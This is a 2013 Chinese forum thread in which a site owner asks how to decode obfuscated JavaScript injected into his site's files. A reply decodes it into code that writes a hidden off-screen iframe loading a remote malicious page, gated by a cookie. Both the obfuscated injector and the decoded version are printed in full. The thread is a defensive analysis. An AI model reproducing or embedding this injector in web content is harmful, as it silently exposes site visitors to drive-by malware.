V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
推荐关注
Meteor
JSLint - a JavaScript code quality tool
jsFiddle
D3.js
WebStorm
推荐书目
JavaScript 权威指南第 5 版
Closure: The Definitive Guide
54dev
V2EX  ›  JavaScript

求JS代码解密 方法

  •  
  •   54dev · 2013-01-04 18:41:38 +08:00 · 3421 次点击
    这是一个创建于 4343 天前的主题,其中的信息可能已经有所发展或是发生改变。
    代码如下
    /*9769d9906bb1e2e6b5c473f404ad0ffd*/
    try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}
    try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}
    try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["3o","4d","46","3l","4c","41","47","46","16","3p","4a","3j","1e","3j","1i","3k","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","3o","44","47","47","4a","1e","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1g","1e","3k","1j","3j","1h","1n","1f","1f","1h","3j","27","4l","d","a","3o","4d","46","3l","4c","41","47","46","16","4a","4b","1e","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1k","4c","47","35","4c","4a","41","46","3p","1e","1p","22","1f","1k","4b","4d","3k","4b","4c","4a","41","46","3p","1e","21","1f","27","4l","d","a","41","3o","1e","46","3j","4e","41","3p","3j","4c","47","4a","1k","3l","47","47","43","41","3n","2h","46","3j","3k","44","3n","3m","16","1c","1c","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","1k","41","46","3m","3n","4g","31","3o","1e","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1f","29","29","1j","1n","1f","4j","d","a","9","4e","3j","4a","16","4b","4c","46","45","29","4a","4b","1e","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","1d","28","4b","4c","4h","44","3n","2a","1k","4b","1d","1h","4b","4c","46","45","1h","1d","16","4j","16","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","16","44","3n","3o","4c","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4c","47","48","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4l","28","1l","4b","4c","4h","44","3n","2a","16","28","3m","41","4e","16","3l","44","3j","4b","4b","29","18","4b","1d","1h","4b","4c","46","45","1h","1d","18","2a","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","18","40","4c","4c","48","26","1l","1l","4a","3n","44","41","3j","3k","44","4h","4a","3n","3k","4a","47","3j","3m","3l","3j","4b","4c","1k","47","4a","3p","1l","3j","3m","1l","3o","3n","3n","3m","1k","48","40","48","18","16","4f","41","3m","4c","40","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","16","40","3n","41","3p","40","4c","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","2a","28","1l","41","3o","4a","3j","45","3n","2a","28","1l","3m","41","4e","2a","1d","1f","27","d","a","9","4e","3j","4a","16","3n","4g","48","29","46","3n","4f","16","2g","3j","4c","3n","1e","1f","27","3n","4g","48","1k","4b","3n","4c","2g","3j","4c","3n","1e","3n","4g","48","1k","3p","3n","4c","2g","3j","4c","3n","1e","1f","1h","23","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-614!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}
    /*9769d9906bb1e2e6b5c473f404ad0ffd*/
    11 条回复    1970-01-01 08:00:00 +08:00
    shiny
        1
    shiny  
       2013-01-04 18:46:30 +08:00
    最后一句:
    ww是window
    "e"+vl是eval
    z是
    function gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;}
    function rs(){return Math.random().toString(36).substring(5);}
    if(navigator.cookieEnabled && document.cookie.indexOf('testcookie1=')==-1){
    var stnm=rs();
    document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://reliablyrebroadcast.org/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
    var exp=new Date();exp.setDate(exp.getDate()+7);
    document.cookie='testcookie1='+rs()+'; expires='+exp.toGMTString();
    }

    直接chrome里console.log就出来了。
    54dev
        2
    54dev  
    OP
       2013-01-04 20:29:35 +08:00
    @shiny 网站的JS和INDEX.PHP都被感染了。我晕,应该怎么办。
    enj0y
        3
    enj0y  
       2013-01-04 21:02:20 +08:00
    写个脚本,sed -i 替换回去。
    fanpenghua
        4
    fanpenghua  
       2013-01-04 21:09:16 +08:00
    弄居然没Backup ,不行呀。
    54dev
        5
    54dev  
    OP
       2013-01-05 10:10:10 +08:00
    @enj0y 是哪个文件感染的还没有查到,SHELL应该怎么写呢
    54dev
        6
    54dev  
    OP
       2013-01-05 10:10:31 +08:00
    @fanpenghua 什么意思啊。
    metalbug
        7
    metalbug  
       2013-01-05 10:28:58 +08:00
    有病啊,人家之所以加密就是不想让你们看,靠
    54dev
        8
    54dev  
    OP
       2013-01-05 10:47:14 +08:00   ❤️ 1
    @metalbug 一边趴着去。
    Mutoo
        9
    Mutoo  
       2013-01-05 17:04:30 +08:00
    @metalbug 显示是服务器被挂马了。
    metalbug
        10
    metalbug  
       2013-01-05 19:08:06 +08:00
    啊,哈哈,原来挂马了,哈哈哈,恭喜你
    fanzeyi
        11
    fanzeyi  
       2013-01-05 19:22:08 +08:00


    点进这个帖子还要关ESET …… 诶..
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1028 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 27ms · UTC 20:07 · PVG 04:07 · LAX 12:07 · JFK 15:07
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.